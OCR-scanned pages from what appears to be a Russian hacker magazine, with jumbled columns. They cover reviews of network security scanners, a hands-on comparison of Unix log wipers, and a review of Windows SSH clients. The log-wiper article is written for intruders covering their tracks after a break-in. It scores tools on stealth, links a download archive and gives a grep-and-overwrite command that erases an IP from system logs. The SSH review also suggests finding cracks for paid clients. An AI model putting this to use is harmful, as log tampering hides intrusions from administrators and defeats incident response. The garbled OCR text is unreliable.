оговорюсь сразу, прога предназначе- 
на для локалок, (но ты, маньяк, мо- 
жешь, конечно, попробовать постро- 
ить карту интернета, за что тебе от 
нас будет большое спасибо), ты смо- 
жешь бдить за сервисами, запущен- 
ными на узлах твоей сети. 

Для админа - самое милое дело, тем 
более что все это представляется в 
виде карты с манерными иконками, 
разными для каждой единицы, то есть 
сервак ты на вид сразу отличишь от 
роутера. Одни раз построил карту, и 
уже как Бог :). То есть, если использо- 
вать эту прогу в содружестве с каким- 
нибудь мощным анализатором секь- 
юрности, то в связке они всех порвут. 
(Галантерейщик и кардинал - это си- 
ла! (с)Три мушкетера). Таким образом, 
зная, что на компе девочки Маши за- 
пущен неизвестно как очутившийся 
там Мелкомягкий веб-сервер, ты мо- 
жешь не заморачиваться на задании 
в политике сканирования на поиск 
дырок в sendmail. Юзаем софтину как 
средство артподготовки. 

На скрине видно, что можно сеть 
представить в виде матрицы :), а мож- 
но в виде списка тачек с сервисами, 
запущенными на них, что, не в при- 
мер, удобнее. Можно задать период 
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Минимал техно. 


Хитрая ретина. 


обновления инфы, так что всегда бу- 
дешь держать руку на пульсе, а варуг 
кто-то поставил себе ЕТР-шник, аты 
06 этом не знаешь. Нехорошо полу- 
чится - инфа мимо пройдет. 


Retina (Shareware). 
Искать: http://www.eeye.com. 
Вес порядка 17 мегабайтов. 


Ретина - это классика - она у нас 
идет вне конкуренции, как заслужен- 
ный ветеран секьюрного сфронта. Как 
известно, продукция электронного 
глаза всегда отличалась знаком каче- 
ства. Количество проверяемых уязви- 
мостей увеличивается с каждым 
днем, так что обновляйся. Как извест- 
но, Ретина отличается от многих соро- 
дичей из своего племени своим движ- 
ком искусственного интеллекта, кото- 
рый позволяет ей определять серви- 


сы, стоящие на нестандартных портах. 


По моему мнению, очччень полезная 
фича, которая позволяет выявлять 
особо хитропопых юзверей, пытаю- 
щихся прикинуться ветошью... Одноз- 
начный must have&use. 


Te 


x 


a 


es Ti 


ры 


Паучара в действии. 


жения. Интерфейс - отсутствует. Типа 
куча закладок, чекбоксов и кнопок. 
Из разряда, если ты такой умный, что 
знаешь про птар, то и пользоваться 
сам научишься. Чем подкупил виндо- 
вый вариант, так это тем, что не надо 
запоминать все атрибуты для запуска 
в командной строке, достаточно галки 
раскидать по полю. 


X-Spider 6.5 (freeware). 
Производитель - отечественный. 
Искать и забирать тут: 
http://www.xspider.ru. 

Язык интерфейса - много, 

но русский в наличии 

(Еще бы! Наш же продукт!). 


Мощнейший инструмент. Как сказа- 
HO на сайте разработчиков: "X-Spider 
по возможностям не уступает, а мес- 
тами и превосходит известные скане- 
ры безопасности, такие, как ISS 
Internet Scanner, Nessus, Retina". На 
слово He верим, верим Ha geno. A ge- 
ло у паучары со словом He расходит- 
ся. Действительно, мощнейшая шту- 


ка, позволяющая получить инфу о 


В составе имеет сканер, шахтера :) - 
специальный модуль, проверяющий 
бажные сдг-ки и скрипты на веб-сер- 
верах, трэйсроутер и своя бродилка, с 
помощью которой, открывая сайты, в 
отдельном окошке ты видишь все 
ссылки, включая скрытые. 


NMAPWIN_1.3.0 


Nmapwin_1.3.0 (freeware). 
Брать тут http://www.insecure.org. 


А это вообще не анализатор безо- 
пасности :). Это порт сканер, но в уме- 
лых ручонках он превращается в 
мощнейшее оружие массового пора- 


проверяемой на вшивость тачке со 
всеми потрохами. 

У паука, также как и у Ретины свой 
интеллектуальный подход к определе- 
нию сервисов, висящих на нестанда- 
ртных портах, мощный инструмента- 
рий, для отлова бажных составляю- 
щих на веб-серверах и многочислен- 
ные свои собственные разработки, ис- 
пользуемые для разведки. Плюс - ха- 
лява для российских пользователей. 


РЕЗЮМЕ 

Да, и под Виндой можно жить и тво- 
рить... или травить? Не важно... в 
принципе :). 


Tan 
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Если использо- 
вать WhatsUp! 
в содружестве 

с каким-нибудь 

мощным ана- 
лизатором 
секьюрности, 
то в связке они 
всех порвут 


В сопроводи- 
ловке к Stat 
Зсаппег гово- 
рится, что сис- 
тема использу- 
ется в Армии 
США, Феде- 
ральной поч- 
товой службе 
и так далее и 
тому подобное 


уецу 950 


ЗОЕТ/ЗАМЕТАЕМ СЛЕДЫ В LINUX 


Обы 4hack 


После тести- 
рования, я 
убедился, что 
идеальных 
логвайперов 
не бывает, ибо 
для каждого 
отдельно взя- 
того вайпера 
выполнялось 
максимум два 
критерия из 
трех. 


ЗАМЕТАЕМ 
СЛЕДЫ В LINUX 


ВСЯ ПРАВДА О ЛОГВАЙПЕРАХ 


Дмитрий Докучаев aka Forb 
(forb@real.xakep.ru) 


считаю, что вариант 

ручного просмотра 

логов незамедлитель- 

но отпадает. Не спо- 

рю, что в мире полно 
мазохистов, но умные люди дали 
нам возможность программиро- 
вать, а грамотные кодеры написали 
автоматические тулзы для удале- 
ния информации в линуксовых ло- 
гах. 


ВВЕДЕНИЕ В ЛОГИ 

Немного теории. Все логи в *nix'ax 
делятся на два вида: текстовые и 
бинарные. Текстовые, как правило, 
могут заполняться различными 
данными, которыми располагают 
внешние программы и утилиты. Го- 
ловным мозгом всей системы текс- 
товых логов является демон SYS- 
10094 (либо его альтернативы). С его 
помощью достигается гибкое веде- 
ние журналов, а также возмож- 
ность записи в логи со стороны лю- 
бого приложения без рутовых прав 
(через функцию syslog()). Вдобавок 
к вышесказанному, администратор 
системы может изменить дефолто- 
вые названия всех текстовых логов 
на любые другие. Но для нас уст- 
ройство и работа syslogd не явля- 
ется главной проблемой, это тема 
отдельной статьи. Поэтому перей- 
дем к разбору другого вида логов. 


Ударная работа за 10 минут ;) 


видишь, ручками такие логи уже не 
почистить ;). 

Я встречал умников, которые 6o- 
ролись с логами после захвата сис- 
темы следующим образом: приби- 
вали syslogd и уничтожали бинар- 
ные журналы дедовским способом 
(rm -f). Ничего удивительного, что 
на следующий день администрато- 
ры просекали, что их систему пои- 
мели, и закрывали доступ к систе- 
ме (предварительно настучав горе- 
хакеру по башке). 


Я встречал умников, которые боролись 
с логами после захвата системы 
следующим образом: прибивали syslogd 
и уничтожали бинарные журналы 
дедовским способом (rm -f) 


Бинарные логи - журналы для 
хранения информации по успеш- 
ным заходам в систему со стороны. 
Нас интересуют три важных бинар- 
ных журнала - /var/log/wtmp, 
/var/run/utmp и /var/log/lastlog (ва- 
риант Linux, в других системах они 
могут называться по-другому). Как 


me 
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ЧИСТИМ ПРАВИЛЬНО! 
Единственным и правильным вари- 
антом чистки логов является ис- 
пользование посторонних тулз, 
или попросту логвайперов. Эта 
статья была бы неактуальна, если 
бы не огромный выбор самопаль- 
ных программ для черного дела. В 


процессе тестирования софта было 
обнаружено множество ошибок в 
его работе, о которых ты, несомнен- 
но, должен знать, чтобы не поста- 
вить крест на своей же безопас- 
ности. 

Итак, что для нас важно в процес- 
се чистки журналов в правильной 
оси? Навскидку выделяются три 
главных критерия, которые должны 
выполняться: 

1. Надежность. После запуска лог- 
вайпера все логи должны быть кор- 
ректно вычищены и остаться 9д0с- 
тупными для дальнейшего журна- 
лирования. 

2. Скорость. Я думаю, тебе не 
понравится, если процесс чистки 
логов затянется до двадцати минут. 
Поверь, такие случаи тоже бывают. 

3. Маскировка и скрытность. Тул- 
зы не должны оставлять за собой 
каких-либо временных файлов ли- 
бо фатальных корок (соге- 
dump’os). 

После тестирования я убедился, 
что идеальных логвайперов He бы- 
вает, ибо для каждого отдельно 
взятого вайпера выполнялось мак- 
симум два критерия. Что сказать, 
лень программистов берет свое, да 


и системы отличаются своей кап- 
ризностью (в Linux, например, 
структура логов отличается от 
структуры в SunOS). 

Ты спросишь, как осуществля- 
лась проверка всех трех критери- 
ев? Отвечаю: самым тщательней- 
шим образом. Все данные, которые 
я намеренно записал в логи, долж- 
ны быть уничтожены коварным 
логвайпером. Скорость проверя- 
лась при помощи команды интерп- 
ретатора time -р. Маскировка выяс- 
нялась при завершении работы 
программы (нередко фатальном)... 


ТЕСТ - ВСЕМУ ГОЛОВА! 

Для обзора потребовалось найти 
шесть добровольцев. Почему 
шесть? Потому что я хотел отли- 
читься от других своей неординар- 
ностью, чтобы добиться более обь- 
ективной оценки ;). Жертвами ста- 
ли следующие логвайперы: уап- 
1512, grlogwipe, zap3, wipe, zap2, 
ghOst. Авторам отдельное спасибо 
за их код и баги, которые намного 


SOFT/3AMETAEM СЛЕ 


bl B LINUX 


ig ht № 


Компиляция на других системах не завершилась успехом 


ным юзерам). Выбираю фактор, ко- 
торый хочу испытать на полную ка- 
тушку, - это скорость. Поэтому тес- 
тирование происходило на 486ах 
процессоре. Автор Ваниша обещал, 
что будут вычищены все текстовые 
логи (messages, secure, xferlog, 
maillog, httpd.access_log u 
httpd.error_log, а также бинарные 
wtmp, utmp и [а од), HO он не ска- 
зал время, за которое вайпер спра- 
вится с работой. Ухмыльнувшись, 


Для администраторов систем логи - сигна- 
лизатор дневной активности и атак, для 


хакеров - предмет немедленного уничто- 
жения, для анализаторов безопасности - 
главный источник информации 


повышали наглядность моего обзо- 
ра, приближая его к реальному. По- 
лигоном являлись три независи- 
мых и самых популярных Unix-like 
оси: Linux RedHat 7.1, FreeBSD 4.7 и 
SunOS 5.8. Я уверен, что ты имел 
дело, по крайней мере, с одной из 
упомянутых. Обзор проводился в 
трезвом состоянии и завершился 
без всяких запарок и эксцессов, 
поэтому не вздумай сомневаться в 
моей искренности. 


VANISH2 = ЛУЧШЕЕ ЧИСТЯЩЕЕ 
СРЕДСТВО ДЛЯ ПОРТАТИВНОГО 
УНИТАЗА ;) 

Первым добровольцем стал 
Vanish2 - логвайпер для правиль- 
ной оси. Испытывался в Linux, как 
и было написано в комментариях к 
коду. Представляет собой отдель- 
ный хеадер и сишник без всяких 
Makefile (BOT OHO - гуманное отно- 
шение программистов к людям!). Ну 
да ладно, руки у меня растут отку- 
да надо, и компилить я еще не ра- 
зучился. Быстро набираю gcc van- 
ish2.c -o vanish2 и... не получаю ни 
одной ошибки (странновато, прав- 
да? ;)). 

Далее идет ознакомление с пара- 
метрами, которые должны быть пе- 
реданы логвайперу. А параметры 
такие: строка для чистки, ip-agpec и 
hostname (резолвить адреса прог- 
раммисты, видимо, не научились, 
поэтому поручили это нам - бед- 


запускаю клинер и ухожу пить ко- 
фе. Какого же было мое удивле- 
ние, когда к моему приходу про- 
цесс не сдвинулся с места! Чистка 
логов заняла чуть больше 10 ми- 
нут. Даже для 486 процессора это 
очень много (я пытался прибли- 
зить ситуацию к реальной, когда 
вайперу придется обрабатывать ги- 
габайтный wtmp-qpain). Посмотрев 
в сорцы, я понял, что в скорости 
виноват именно Ваниш, а никак не 
система. Программист решил про- 
листывать каждый рекорд wtmp go 
встречи с шаблоном, хотя правиль- 
нее бы было смещаться от конца 
файла... 


Со скоростью все ясно. Просмот- 
рев логи, я увидел, что мои следы 
действительно исчезли. Временных 
файлов на месте замечено не бы- 
ло, равно как и соге. 

Мне стало интересно, что будет, 
если я скомпилю Ваниш под 
FreeBSD. Как оказалось, ничего хо- 
рошего из этого не вышло - систе- 
ма ругнулась на отсутствие хеаде- 
pa. Испытывать Ha SunOS я не стал, 
ибо знал о фатальном завершении 
эксперимента (в солярке все по- 
другому: от имен логов до их струк- 
туры). 


ОЦЕНКА 

Открыв блокнотик, я записал не- 
большой отчет по Ванишу (оцени- 
вал по 10-бальной шкале). 


Надежность: 
Текстовые логи - 9 баллов. 
Бинарные логи - 1Ю баллов. 
Скорость - 2 балла. 
Маскировка - 7 баплов (времен- 
ные файлы имелись, но они удаля- 
лись после работы. Если юзер 
прервет работу логвайпера - темпы 
удалены не будут). 
Многоплатформенность - 4 бапла. 


Общая оценка - 7 баллов. 


GRLOGWIPE - ЛУЧШЕЕ 
РЕШЕНИЕ ДЛЯ FREEBSD 
Небрежно переместив Ваниш в пап- 
ку испытанных, я взялся за следую- 
щий экземпляр: grlogwipe, который 


Почти все бинарные логи на Фре были потерты с помощью Grlogwipe 
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Рассматривае- 
мые экземпля- 
ры ты можешь 
утянуть по 
ссылке: 
http:// 
k-uralsk.net/ 
forb/1/x/log- 
wipers.tar.gz. 
Для удобства 
- все шесть 
логвайперов 
помещены в 
один архив. 
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Обы 4hack 


К сожалению, 
если админ 
установил 
другой демон 
для ведения 
логов, то их 
чистка будет 
довольно 
сложна. 

К примеру, 
syslog-ng фор- 
мирует иерар- 
хию каталогов 
в /var/log и 
пишет в каж- 
дый журнал 
отдельные 
события. Если 
посчитать, то 
в сумме мы 
получим около 
20 логов, пути 
и имена кото- 
рых отлича- 
ются от 
дефолтовых... 


Выяснение причины core-dumped’a 


первоначально решил проверить на 
фряхе (зачем зацикливаться на 
Linux - для нас важна многоплат- 
фрорменность). Компиляция прошла 
без всяких сложностей. Запустив 
grlogwipe без параметров, я удивил- 
ся многофункциональности этого 
клинера. Но обо всем по порядку. 

Первый минус grlogwipe - это отсу- 
тствие возможности чистки тексто- 
вых логов. Он предназначался толь- 
ко для трех бинарных файлов. Но 
программисты подошли к этой проб- 
леме довольно неплохо. Логвайпер 
умеет как менять хост в рекорде ло- 
га, так и имя пользователя. Разуме- 
ется, все данные могут быть удале- 
ны - все зависит от желания юзера, 
то бишь тебя ;). По скорости клинер 
показал себя довольно неплохо - 
всего несколько долей секунды 
(просмотр лога начинался именно с 
конца, а не с начала, как в Vanish2). 

К сожалению, файл /var/log/last- 
log во фряхе не обрабатывался. 
Запись о подключении юзера сох- 
ранилась в нем, как будто лог ник- 
то и не изменял. 

Далее я решил поиграть с опция- 
ми замены хоста и юзера и прове- 
рить, действительно ли это рабочие 
возможности, а не просто декора- 
ции. Чтобы изменить имя пользова- 
теля в записях wtmp, достаточно 
указать имя старого и нового поль- 
зователя через опции -и и -U соот- 
ветственно. Аналогично с ip-agpe- 
сом. В довершение всего, должна 
быть опция -w (write), которая и бу- 
дет изменять рекорды wtmp. Опция 
-г необходима для удаления всех 3a- 
писей, удовлетворяющих заданному 
шаблону. Шаблон, как ты уже по- 
HAN, задается при помощи -и и -h оп- 
ций, указывающих на имя пользова- 
теля и хост (ip-agpec). 

Скрытность была идеальной. Ни в 
сорцах, ни на практике не было 
следов от временных файлов. Лог- 
вайпер завершался корректно, не 
оставляя за собой корок. 


Компилим и юзаем wipe 


Grlogwipe испытывался как в Ли- 
не, так и в FreeBSD. Итоги экспери- 
ментов были практически одинако- 
выми, что еще раз подчеркивало 
универсальность клинера. 


Надежность: 
Текстовые логи - O баллов. 
Бинарные логи - 9 баллов. 
Скорость - 10 баллов. 
Маскировка - 10 баллов. 
Многоплатформенность - 8 баллов. 


Общая оценка - 7 баллов. 


ZAP3 - МОДНЫЙ КЛИНЕР 
НОВОГО ПОКОЛЕНИЯ 

Следующим экземпляром в обзоре 
был логвайпер под именем Zap3 (прав- 
да, сишник называется по-другому, что 
осложняет его поиски). Порадовало, 
что Zap3 способен чистить как бинар- 
ные, так и текстовые логи. Причем, де- 
лает это с особой тщательностью (нет- 
ронутых записей замечено не было). 
Что примечательно, клинер работает с 
логами напрямую и не оставляет за со- 
бой временных сфайлов. 

Скорость колеблется в пределах от 
двух долей до секунды (в зависимости 
от размера журнала). Все благодаря 
продуманному алгоритму и успешной 
его реализации ;). К сожалению, тексто- 
вые логи вычищались не полностью (в 
auth-nore была замечена запись, кото- 
рой по логике не должно было быть). 

Что касается многоплатформен- 
ности, компиляция на Фре ни к чему 
хорошему не привела. Как пишут 
авторы, плогвайпер тестировался 
лишь Ha RedHat и Mandrake дистри- 
бутивах правильной оси, поэтому их 
можно понять и простить. 

А теперь самое интересное. После 
того как Zap3 дошел go nora 
/var/log/syslog, он жестко обпомалпся, 
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Zap2 - пучший чистильщик gna SunOS 


ибо этого файла в системе He было. 
Обычно на такой случай делается 
проверка. Тут она полностью отсут- 
ствовала, и бинарник выпал в кору. 
Разумеется, что после такого случая 
доверять клинеру нельзя, ибо кора в 
рабочем каталоге - недобрый знак. 
Несмотря на недостатки, общее 
впечатление от этого лога непло- 
хое. Клинер справился с задачей 
практически на 100%, но мелкие не- 
дочеты сделали свое грязное дело. 


Надежность: 
Текстовые логи - 6 баллов. 
Бинарные логи - 9 баллов. 
Скорость - 10 6annos. 
Маскировка - 2 балла. 
Многоплатформенность - 5 баллов. 


Общая оценка - 5 баллов. 


СКАЗКА ПРО SUNOS 

Как ты, наверное, заметил, я упоми- 
нал лишь о Linux и FreeBSD и ни 
слова не сказал о других системах. 
Это не совсем правильно. Если по- 
думать, Солярка всегда была и бу- 
дет надежной системой, поэтому 
упомянуть ее имя в обзоре я просто 
обязан. Для этой цели я выбрал два 
логвайпера, которые опишу в одном 
срлаконе. Это zap2 (кстати, удиви- 
тельно, но ничего общего с Zap3 у 
него нет ;)) и wipe. 

Посмотрев комментарии к коду 
Wipe, я понял, что это многоплат- 
форменная вещь, но в целом кли- 
Hep ориентирован на SunOS. Ском- 
пилив его с параметром Solaris, я 
попытался почистить заранее пос- 
готовленные логи. Wipe предназна- 
чался только для чистки бинарных 
файлов (как и grlogwipe). Причем, 
для каждого лога существовала 
своя опция (универсальная чистка 
была бы намного приятнее). Я за- 
пустил логвайпер три раза с пара- 
метрами и, ми | (для utmp, wtmp и 
[а од, соответственно). К моему 
удивлению, wtmp остался без из- 
менений. Остальные файлы были 
успешно обработаны. 

Скорость опять же не подкачала. 
Весь процесс выполнился за нес- 
колько долей секунды. Временных 
файлов поблизости нигде не было. 

Вердикт - wipe пригоден лишь 
для чистки utmp и lastlog. На боль- 
шее он вряд ли потянет. 


Следующим шагом была компиля- 
ция Zap2. Этот чудо-клинер был ори- 
ентирован только на Солярки и поэ- 
тому оставлял большие надежды. 
Компиляция прошла без проблем. 
Запуск без параметров выдал един- 
ственное слово Еггог, что привело 
меня в задумчивость. То ли логвай- 
пер отказывался запускаться на 
этой платформе, то ли у него просто 
не было процедуры usage(). К моему 
счастью, второе предположение 


SOFT/3AMETAEM СЛЕДЫ В LINUX 


репать лог с ключиком -\ и последу- 
ющим выводом инфы в темп-файл, а 
затем заменить его на нужный. То 
есть, чтобы удалить в /var/log/mes- 
sages ip-agpec 127.0.0.1, достаточно 
было выполнить команду grep -\ 
127.0.0.1 /var/log/messages > tmp && 
mv -f tmp /var/log/messages. Этот an- 
горитм и выполнялся в рассматрива- 
емом клинере. 

Что сказать... Если выбросить 
часть кода, касающуюся чистки би- 


Если подумать, Conspka всегда была 
и будет надежной системой, поэтому 
упомянуть ее имя в обзоре я просто обязан 


подтвердилось. Поразмыслив логи- 
чески, я запустил гар? с параметром 
user (где user - имя пользователя). 
Увидел магическое слово Zap! и go- 
гадался, что клинер успешно выпол- 
нил поставленную ему задачу. Прос- 
мотрев результаты работы, я убе- 
дился, что гар2 действительно все 
сделал, как я просил. 


ОЦЕНКА: 


Надежность: 
Текстовые логи - O баллов. 
Бинарные логи - 8 баллов. 
Скорость - 8 баплов. 
Маскировка - 5 баллов. 
Многоплатформенность - 4 балла. 


Общая оценка - 5 баллов. 


И ЭТО НЕ ТОЛЬКО СИ 

Что примечательно, логвайперы 
бывают не только сишными. Натк- 
нувшись на экземпляр под назва- 
нием ghOst.sh, которое говорило о 
том, что клинер был написан на sh- 
языке, я решил добавить его в 
свой обзор. Первые мысли были о 
том, что этот реальный клинер зай- 
мет первое место в моем обзоре. 

Итак, начало тестирования. Запус- 
тив ghOst.sh без опций, я увидел, 
что он просит hostname в качестве 
параметра. Удовлетворив его жела- 
ния, я проследил за действиями 
призрака. Прочесав 10 текстовых 
логов, он удалил из них все посто- 
ронние записи. Моему удивлению 
не было предела, когда на экране 
появились строки, касающиеся би- 
нарных файлов. Как удалить из них 
записи на языке Sh, я не представ- 
nan. 

Скрипт очень быстро завершил 
чистку. Заценив м тр, я увидел, что 
его попросту не было. Точнее, его 
размер составлял О байт. Первое 
впечатление об этом клинере быстро 
изменилось. В текстовых логах вся 
компрометирующая информация бы- 
ла удалена. Впрочем, алгоритм чист- 
ки текстовиков от ненужных фраз 
был прост. Сперва надо было прог- 


нарников, то получится неплохой 
логвайпер для ascii-noros ;). 


ОЦЕНКА: 


Надежность: 
Текстовые логи - 6 баллов. 
Бинарные логи - © баллов. 
Скорость - 8 баллов. 
Маскировка - 4 балла. 
Многоплатформенность - 4 балла. 


Общая оценка - 4 балла. 


И КТО ЖЕ ПОБЕДИТЕЛЬ? 
Настало время подвести итоги моего 
тест-драйва. Первое место я прису- 
gun vanish2. Он хоть и отличается 
своей медлительностью, но качество 
работы, пожалуй, у него отличное. 
Второе место отдаю grlogwipe. Имея 
несомненные плюсы в скорости и мно- 
гоплаторорменности, он одновременно 
лажает в ascii-norax и бинарном lastlog. 
Но, опять таки, дополнительные cpe- 
нечки клинера мне очень понравились. 
На третьем месте располагается 
Zap3. Хоть его и контузило при неу- 
дачном открытии syslog, он неплохо 


Все свежие логвайперы обитают тут 


справляется с поставленной зада- 
чей. Немного универсальности и 
стабильности - и это будет лучший 
логвайпер ;). 

Насчет остальных экземпляров 
ничего говорить не буду. Все было 
сказано выше. Отдельных слов в 
их адрес у меня попросту нет. 


МОРАЛЬ СЕЙ БАСНИ 

Надеюсь, что после прочтения этой 
статьи ты поймешь - идеальных 
логвайперов не существует. Иде- 
альные вещи пишутся только при- 
менительно к конкретной ситуации. 
Поэтому мой тебе совет: учи Сии 
напиши свой суперклинер, который 
способен удовлетворять всем вы- 
шеназванным критериям, и тебе бу- 
дут благодарны много людей. 
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Чтобы yga- 
лить в 
/var/log/mes- 
sages ip-agpec 
127.0.0.1, goc- 
таточно вы- 
полнить ко- 
манду grep -v 
127.0.0.1 
/var/log/mes- 
sages > tmp 
&& mv -f tmp 
/var/log/mes- 
sages. 
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Вес SecureCRT 
в семь раз пре- 
вышает разме- 
ры PuTTY, что 
еще раз гово- 
рит о компакт- 
ности первого 
клиента 
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УПРАВЛЯЕМ 
УДАЛЕННО 


РУКОВОДСТВО ПО ВЫБОРУ SSH КЛИЕНТА ПОД ВИН 


Дмитрий Докучаев 
aka Forb (forb@real.xakep.ru) 


юбителям сфорточек пе- 

регреваться не сове- 

тую. О них Microsoft по- 
заботилась всей душой, подарив воз- 
можность визуального управления. 
На плохом канале такое управление 
становится хуже пытки, так как ско- 
рость оставляет желать лучшего. А 
вот {епе{-сервис неплохая штука, хо- 
тя его пакеты проходят без шифрова- 
ния, что ненадежно. Что тут сказать - 
налицо попытки обыграть Linux в воз- 
можностях. Эх, Microsoft, Мсгозон... 

Оставим извечную проблему конку- 

ренции осей и перейдем к более су- 
щественной для пользователя - проб- 
леме выбора Telnet/SSH клиента nog 
Вынь на все случаи жизни. Стандарт- 
ный telnet.exe сильно далек от совер- 
шенства, поэтому про него даже не 
буду упоминать. В Инете полно cocp- 
та, который мог бы удовлетворить все 
самые сокровенные желания пользо- 
вателя, поэтому наша с тобой задача 
найти для тебя хороший инструмент. 


ОБОЗРИМ АЛЬТЕРНАТИВЫ 
В мой обзор я решил включить три 
виндовых Telnet/SSH клиента. Все эти 
программы были изучены мной в те- 
чение года, и про каждую я могу гово- 
рить с уверенностью. Но перед тем 
как начать обзор, давай разберемся, 
что хочет пользователь от клиента. 

1. Простоту и удобство в работе. 
Клиент не должен содержать в себе 
каких-либо заумных настроек и меню- 
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Стартуем службу Telnet в форточках 


шек, ибо в Windows пользователи 
привыкли к простоте и "интуитивно 
понятному интерфейсу". 

2. Функциональность. В клиенте 
должны присутствовать все жизнен- 
но необходимые для пользователя 
функции, делающие работу удобной. 

Нередко попытка сочетать эти два 
критерия не приводит ни к чему хоро- 
шему, и клиент не становится попу- 
лярным в кругу юзеров. 

Посмотрим, какие результаты даст 
наш объективный обзор. Как я уже го- 
ворил, я рассматривал три различных 
клиента. Все они были написаны в раз- 
ное время и разными программистами. 


PUTTY - ЛУЧШИЙ КЛИЕНТ 
НОВОГО ПОКОЛЕНИЯ 

Описание 
Вряд ли найдется человек, который не 
слышал о таком клиенте, как PUTTY. 
Первая версия PulTY вышла еще в 
далеком 1997 году. Конечно, его воз- 
можности намного отличались от воз- 
можностей последней версии, но по 
какой-то причине клиент очень полю- 
били и пользуются им до сих пор. 


Обилие цвета еще никому не мешало =) 


Чего же в нем хорошего? Во-пер- 
вых, компактность. В настроечном ре- 
жиме клиент занимает всего четверть 
экрана. Удобная навигация по пунк- 
там меню делает PUTTY очень прив- 
лекательным. Радует присутствие 
различных цветовых схем, поддержка 
всех опций линуксоидного клиента 
/usr/bin/ssh, а также несколько но- 
вовведений, которые появились в 
последней версии. Это поддержка со- 
единения через Ргоху (живи безопас- 
но!), логирование всех набранных ко- 
MaHg, а также выбор нужной кодиров- 
ки прямо в клиенте. Перечислять все 
опции PuTTY попросту бессмысленно 
- не хватит бумаги. Одно гарантирую: 
если ты поюзаешь этот чудо-клиент, 
то останешься доволен. Лично я поз- 
накомился с PUTTY около трех лет на- 
зад и использую в работе до сих пор. 


Соединение 
Давай попробуем испытать PUTTY в 
работе. Соединимся с правильной 
осью, используя этот клиент. Для это- 
го тебе потребуется пару раз кликнуть 
мышкой и заполнить два-три поля. В 
первую очередь вписывай Host Name 
нужного сервера и тип соединения 
SSH (я надеюсь, что ты используешь 
только этот безопасный протокол). За- 
тем можешь сохранить сессию, чтобы 
в следующий раз только выбрать из 
списка нужное соединение без пов- 
торного ввода адреса сервера. 

После успешного коннекта у тебя 
попросят имя пользователя и па- 
роль. Затем осуществится соедине- 
ние с удаленным сервером, и ты мо- 
жешь спокойно осуществлять конт- 
роль над ним. 


Приговор 
PuTTY всегда останется моим люби- 
мым клиентом. И не нужно обвинять 


меня в предвзятости ;). Попробуй по- 
юзать сам, и тебе обязательно понра- 
вится. Как видно, клиент сочетает в 
себе удобство и функциональность 
самым наилучшим образом, поэтому 
занимает почетное первое место в 
моем обзоре. 

Скачать PuTTY ты сможешь с сайта 
производителя: 
http://www.chiark.greenend.org.uk/~ 
sgtatham/putty/. Tam же ты найдешь 
отдельные утилиты для генерации 
ключей, использования FTP over SSH 
и прочие нужные тулзы. 

Клиент является бесплатным, что 
делает его еще более популярным. 


SECURECRT - БОЛЬШОЙ | 
КЛИЕНТ ДЛЯ БОГАТЫХ ЛЮДЕЙ 


Описание 
Следующим в обзоре находится кли- 
ент SecureCRT. Противники PuTTY на- 
ходят спасение в этой программе. 
Клиент имеет в себе множество 
функций, включая поддержку 
SOCKS/Proxy, создание ключей в са- 
мом приложении (чего не скажешь о 
PuTTY), запоминание пароля и авто- 
соединение с удаленной машиной и 
прочие вкусности. 

Если в функциональности 
SecureCRT показывает себя на 100%, 
то в удобстве он намного проигрыва- 
ет PUTTY. Во-первых, отсутствует под- 
держка перекодировки текста, что де- 
лает работу неудобной. Во-вторых, в 
удаленных приложениях правильной 
оси (mc, ее и т.п.) отказываются рабо- 
тать некоторые функциональные 
клавиши. И, наконец, клиент является 
платным, более того, для свежей вер- 
сии я даже не мог найти кряка. Я ду- 
маю, тебе не захочется платить раз- 
работчикам за использование 
SecureCRT в работе. 


Соединение 
Соединимся с удаленным сервером, 
чтобы проверить клиент в работе. 
Для этого давим на левую кнопку 
(Connect), создаем новую запись 
(New session). В открывшемся окне 
заполним поля Name (имя соедине- 
ния), протокол (telnet/ssh), адрес сер- 
вера, порт, а также имя пользовате- 
ля. После заполнения полей жмем 
Connect и вводим пароль в появив- 
шемся окне. При правильных 
действиях тебе высветится стандарт- 
ный prompt удаленной машины. 
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Клиент поддерживает соединение 
не только по SSH и Telnet. Можно за- 
цепиться на последовательный порт 
удаленной машины через Riogin, Tapi 
и прочие экзотические протоколы. 


Приговор 
Как я уже сказал, SecureCRT не так удо- 
бен, как PUTTY. Нет поддержки удобно- 
го копирования текста, приятной подде- 
ржки цветов, звуков и прочих примо- 
чек. Но, несмотря на это, пользователи 
любят СКТ и пользуются им, следя за 
появлениями свежих версий. 

Брать SecureCRT на родном сайте: 
http://www.vandyke.com/. Для даун- 
лоада клиента тебя попросят ввести 
твои личные данные (имя, адрес, е- 
mail) и лишь затем предложат ска- 
чать программу. Вес программы в 
семь раз превышает размер PUTTY, 
что еще раз говорит о компактности 
первого клиента ;). 


SSHPRO - МИНИМУМ ФУНКЦИЙ, 
МАКСИМУМ УДОБСТВА 


Описание 
Последним в списке находится прог- 
рамма SSHPro. Она мне чем-то напом- 
нила Telnet в 98'х окошках. Тот же 
белый CPOH, та же навигация, те же 
пункты меню. Только в телнете не бы- 
ло поддержки захода по SSH, в 
SSHpro такая возможность имеется. 

Если заглянуть в опции, то мы не 
найдем ничего мощного. Опции огра- 
ничиваются LocalEcho, типом посылки 
данных, выбором шрисфта и частотой 
мерцания курсора. Опции SSH задают- 
ся в пЕфайле tsshpro.ini, который ле- 
жит в рабочем каталоге клиента. Туда 
можно занести срайл с ключами, де- 
фролтовое имя пользователя, метод 
авторизации и прочие полезные вещи. 


Соединение 
Попробуем соединиться с удаленной 
системой. На этот раз с форточками 
:), а именно с Windows XP Professional 
Edition. Открываем пункт меню 
Commands->connect. Задаем тип сое- 
динения Telnet, вбиваем адрес маши- 
ны и ждем успешного соединения. 
После этого можно управлять систе- 
мой без ограничений. 


Что сказать, работать с этим клиен- 
том вполне возможно, он мне пока- 
зался даже несколько удобнее, чем 
SecureCRT из-за своей компактности. 
Все познается в сравнении, поэтому 
советую тебе попробовать 55НРГо, и, 
возможно, он тебе понравится ;). 


Приговор 
Конечно, go PUTTY клиенту далеко. 
Но что-то хорошее в этой штуковине 
определенно имеется. Жирным мину- 
сом является 5Паге\маге'ность продук- 
та - за все хорошее нужно платить :). 
Но сайты с кряками еще никто не от- 
менял, поэтому, если не хочешь пла- 
тить, придется поискать лекарство. 


Скачать сей клиент можно с сайта 
http://labtam-inc.com/. Весит npor- 
рамма два с лишним мегабайта (что 
умудрились запихать туда разработ- 
чики, одному Богу известно). 


ИТОГИ? 

Если оценивать все проекты по 10- 
балльной шкале, то можно объявить 
следующие результаты обзора: 


PuTTY: 9 баллов 
SecureCRT: 6 баллов 
